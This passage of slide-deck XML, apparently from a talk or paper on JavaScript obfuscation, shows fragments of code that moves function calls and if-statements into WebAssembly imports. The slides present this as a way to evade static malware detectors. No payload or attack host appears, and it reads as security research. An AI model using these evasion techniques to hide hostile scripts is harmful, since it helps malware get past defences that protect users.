                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>obfusca-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accent1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>tion</a:t>
              </a:r>
              <a:endParaRPr sz="1400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="169" name="Google Shape;169;p29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1097552" y="3600791"/>
            <a:ext cx="914400" cy="1125417"/>
            <a:chOff x="4889487" y="2999081"/>
            <a:chExt cx="914400" cy="1125417"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="170" name="Google Shape;170;p29"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4889487" y="2999081"/>
              <a:ext cx="914400" cy="1125417"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="171" name="Google Shape;171;p29"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4954142" y="3387138"/>
              <a:ext cx="81945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accent1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>obfusca-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accent1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>tion</a:t>
              </a:r>
              <a:endParaRPr sz="1400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="172" name="Google Shape;172;p29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1097280" y="866402"/>
            <a:ext cx="914400" cy="1125417"/>
            <a:chOff x="4881691" y="2999081"/>
            <a:chExt cx="914400" cy="1125417"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="173" name="Google Shape;173;p29"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4881691" y="2999081"/>
              <a:ext cx="914400" cy="1125417"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="174" name="Google Shape;174;p29"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4938069" y="3367682"/>
              <a:ext cx="81945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accent1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>obfusca-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accent1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>tion</a:t>
              </a:r>
              <a:endParaRPr sz="1400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175" name="Google Shape;175;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3345820" y="3643986"/>
            <a:ext cx="1939011" cy="64633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Static malware detectors</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="176" name="Google Shape;176;p29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="182880"/>
            <a:ext cx="8520600" cy="746545"/>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Obfuscation Techniques</a:t>
            </a:r>
            <a:endParaRPr sz="3200" b="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="177" name="Google Shape;17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pic>
        <p:nvPicPr>
          <p:cNvPr id="178" name="Google Shape;178;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4203634" y="2441531"/>
            <a:ext cx="386080" cy="482600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="179" name="Google Shape;179;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3470607" y="2445519"/>
            <a:ext cx="386080" cy="482600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="180" name="Google Shape;180;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5177501" y="2405868"/>
            <a:ext cx="457603" cy="559294"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="181" name="Google Shape;181;p29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4857459" y="2199361"/>
            <a:ext cx="1750128" cy="1745063"/>
            <a:chOff x="5050857" y="2811638"/>
            <a:chExt cx="1750128" cy="1745063"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="182" name="Google Shape;182;p29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5050857" y="2811638"/>
              <a:ext cx="1067100" cy="1062000"/>
            </a:xfrm>
            <a:prstGeom prst="donut">
              <a:avLst>
                <a:gd name="adj" fmla="val 8904"/>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83" name="Google Shape;183;p29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="2697115">
              <a:off x="6072292" y="4092638"/>
              <a:ext cx="758372" cy="229739"/>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4" name="Google Shape;184;p29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="2729819">
              <a:off x="5875735" y="3745216"/>
              <a:ext cx="342394" cy="99281"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:pr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65"/>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Function Calls, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>If Statements</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="773" name="Google Shape;773;p65"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134149" y="822960"/>
            <a:ext cx="8778240" cy="4229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 =&gt;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_ifInstance0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WebAssembly.Instance(_ifWasmModule,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ifImp: () =&gt; {</a:t>
            </a:r>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 =&gt;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_callInstance0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WebAssembly.Instance(_callWasmModule,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callImport: () =&gt;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.body.appendChild(x22);}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_callInstance0.exports;</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_exports.call_func();</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elseImp: () =&gt;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_ifInstance0.exports;</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_exports.if_func(x33 ? 1 : 0);</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774" name="Google Shape;774;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="463987" y="2450656"/>
            <a:ext cx="4670144" cy="131187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775" name="Google Shape;775;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2820566" y="191763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65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1272679" y="208457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65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3445425" y="226777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65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1628164" y="226777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65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="337035" y="1435852"/>
            <a:ext cx="4846320" cy="3346009"/>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0" name="Google Shape;780;p65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5510370" y="822960"/>
            <a:ext cx="3675887" cy="423192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param</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383A42"/>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"elseImport"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$t1</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local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>.get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="986801"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>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if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="383A42"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="A0A1A7"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>;; label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end</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="781" name="Google Shape;781;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5545882" y="1168542"/>
            <a:ext cx="3383280" cy="171986"/>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2" name="Google Shape;782;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5545882" y="1506877"/>
            <a:ext cx="3383280" cy="339677"/>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3" name="Google Shape;783;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5545882" y="2174455"/>
            <a:ext cx="3383280" cy="1181304"/>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4" name="Google Shape;784;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="439444" y="4280914"/>
            <a:ext cx="2850897" cy="343552"/>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5" name="Google Shape;785;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66"/>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Function Calls, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>If Statements</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="791" name="Google Shape;791;p66"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134149" y="822960"/>
            <a:ext cx="8778240" cy="4229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 =&gt;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_ifInstance0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WebAssembly.Instance(_ifWasmModule,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ifImp: () =&gt; {</a:t>
            </a:r>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 =&gt;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_callInstance0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WebAssembly.Instance(_callWasmModule,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callImport: () =&gt;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.body.appendChild(x22);}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_callInstance0.exports;</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_exports.call_func();</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elseImp: () =&gt;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_ifInstance0.exports;</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_exports.if_func(x33 ? 1 : 0);</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792" name="Google Shape;792;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="463987" y="2450656"/>
            <a:ext cx="4670144" cy="131187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793" name="Google Shape;793;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2820566" y="191763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66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1272679" y="208457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66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3445425" y="226777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66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1628164" y="226777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66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="337035" y="1435852"/>
            <a:ext cx="4846320" cy="3346009"/>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8" name="Google Shape;798;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5510370" y="822960"/>
            <a:ext cx="3675887" cy="423192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param</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383A42"/>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"elseImport"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$t1</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local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>.get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="986801"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>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if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="383A42"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="A0A1A7"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>;; label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end</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="799" name="Google Shape;799;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5545882" y="1168542"/>
            <a:ext cx="3383280" cy="171986"/>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0" name="Google Shape;800;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5545882" y="1506877"/>
            <a:ext cx="3383280" cy="339677"/>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1" name="Google Shape;801;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5545882" y="2174455"/>
            <a:ext cx="3383280" cy="1181304"/>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2" name="Google Shape;802;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="337035" y="4612740"/>
            <a:ext cx="731520" cy="164592"/>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3" name="Google Shape;803;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="337035" y="1435852"/>
            <a:ext cx="731520" cy="164592"/>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4" name="Google Shape;804;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67"/>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Function Calls, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>If Statements</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="810" name="Google Shape;810;p67"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134149" y="822960"/>
            <a:ext cx="8778240" cy="4229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 =&gt;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_ifInstance0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WebAssembly.Instance(_ifWasmModule,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ifImp: () =&gt; {</a:t>
            </a:r>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 =&gt;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_callInstance0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WebAssembly.Instance(_callWasmModule,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callImport: () =&gt;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.body.appendChild(x22);}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_callInstance0.exports;</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_exports.call_func();</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elseImp: () =&gt;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_ifInstance0.exports;</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_exports.if_func(x33 ? 1 : 0);</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811" name="Google Shape;811;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="463987" y="2450656"/>
            <a:ext cx="4670144" cy="131187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812" name="Google Shape;812;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2820566" y="191763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67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1272679" y="208457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67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3445425" y="226777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67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1628164" y="226777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67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="337035" y="1435852"/>
            <a:ext cx="4846320" cy="3346009"/>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7" name="Google Shape;817;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5510370" y="822960"/>
            <a:ext cx="3675887" cy="423192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param</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383A42"/>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"elseImport"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$t1</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local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>.get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="986801"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>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if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="383A42"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="A0A1A7"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>;; label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end</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="818" name="Google Shape;818;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5545882" y="1168542"/>
            <a:ext cx="3383280" cy="171986"/>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9" name="Google Shape;819;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5545882" y="1506877"/>
            <a:ext cx="3383280" cy="339677"/>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0" name="Google Shape;820;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5545882" y="2174455"/>
            <a:ext cx="3383280" cy="1181304"/>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1" name="Google Shape;821;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="463987" y="4451113"/>
            <a:ext cx="2286000" cy="164592"/>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822" name="Google Shape;822;p67"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="2794356" y="2592053"/>
            <a:ext cx="2856936" cy="1941356"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="823" name="Google Shape;823;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68"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="91440"/>
            <a:ext cx="8520600" cy="673561"/>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Transforming Strings, Function Calls, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>If Statements</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="829" name="Google Shape;829;p68"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134149" y="822960"/>
            <a:ext cx="8778240" cy="4229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00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>window</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>.onload = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
